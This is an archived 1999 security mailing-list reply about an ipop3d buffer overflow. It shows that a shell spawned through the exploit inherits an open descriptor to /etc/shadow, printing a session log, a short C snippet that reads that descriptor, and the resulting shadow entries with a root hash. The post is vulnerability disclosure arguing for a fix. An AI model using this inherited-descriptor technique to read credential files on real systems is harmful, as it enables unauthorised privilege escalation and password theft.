Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight

From: M.C.Mar (woloszynat_private)
Date: Thu Apr 08 1999 - 07:39:30 PDT

Next message: Russell Van Tassell: "Solaris7 and ff.core"

Previous message: Thomas Zehetbauer: "Lotus Notes Locations & DST"
Next in thread: Casper Dik: "Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 6 Apr 1999, Stefan Rompf wrote:

> Hello Michal,
>
> At 01:41 07.03.99 +0100, you wrote:
>
> >Exploited overflow in ipop3d could be used to gain superuser access (the
> >only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
>
> Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage:
>
>     If the effective user ID of the process calling setuid()  is
>     the  super-user, the real, effective, and saved user IDs are
>     set to the uid parameter.
>
> Linux behaves the same way, IMHO this is defined in POSIX.
>
But, (un)fortunately when exploiting ipop3d I found something like this:

Grabarz:~emsi# lsof -n | grep 1190
sh        1190 emsi  cwd    DIR        8,1    1024        2 /
sh        1190 emsi  rtd    DIR        8,1    1024        2 /
sh        1190 emsi  txt    REG        8,1  279352    16324 /bin/bash
sh        1190 emsi  mem    REG        8,1   78828    30629 /lib/ld-linux.so.1.9.5
sh        1190 emsi  mem    REG        8,1   11493    79564 /lib/libtermcap.so.2.0.8
sh        1190 emsi  mem    REG        8,1  605044    79566 /lib/libc.so.5.4.33
[...]
sh        1190 emsi    3r   REG        8,1     598    24674 /etc/shadow

Shel spawned via ipop3d explotation (no bonus -- no exploit core) inherits
opened fd :)

So we may do something like this:

emsi:~emsi# telnet grabarz 110
Trying 192.168.0.19...
Connected to grabarz.
Escape character is '^]'.
+OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRCat_private) at Fri, 9 Apr 1999 15:19:33 +0000 (   )
user emsi
+OK User name accepted, password please
pass qpqp01
id;
uid=1002(emsi) gid=100(users) groups=100(users)
: command not found
bash -i;
bash$ cd ~emsi
cd ~emsi
bash$
bash$ cat p.c
cat p.c
        char buf[255];
        lseek(3,0,0);
        read(3,buf,255);
        printf("Be my guest:\n%s\n",buf);
}
bash$
bash$ gcc p.c
gcc p.c
bash$
./a.out
Be my guest:
root:csKcGWMEUMGUs:10539:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
ftp:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
new¿¤þ^
`
bash$
bash$

That's only example... It proofs that exploiting ipop3d could be usefull
to obtain root (or any other account) access and that the vulnerability
should be fixed.

P.S.
Greetings Lam3rZ Group, 3Kombajd_do_czere¶ni testers and Lcamtuf (ty lamo,
czy wkoñcu pode¶lesz mi ten txt co mi obieca³e¶? ;).

--
___________________________________________________________________________
M.C.Mar   An NT server can be run by an idiot, and usually is.   emsiat_private
      "If you can't make it good, make it LOOK good." - Bill Gates
  Moze to nie miejsce, ale tak np. programy M$ to swoiste pomniki glupoty.

Next message: Russell Van Tassell: "Solaris7 and ff.core"
Previous message: Thomas Zehetbauer: "Lotus Notes Locations & DST"
Next in thread: Casper Dik: "Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:46 PDT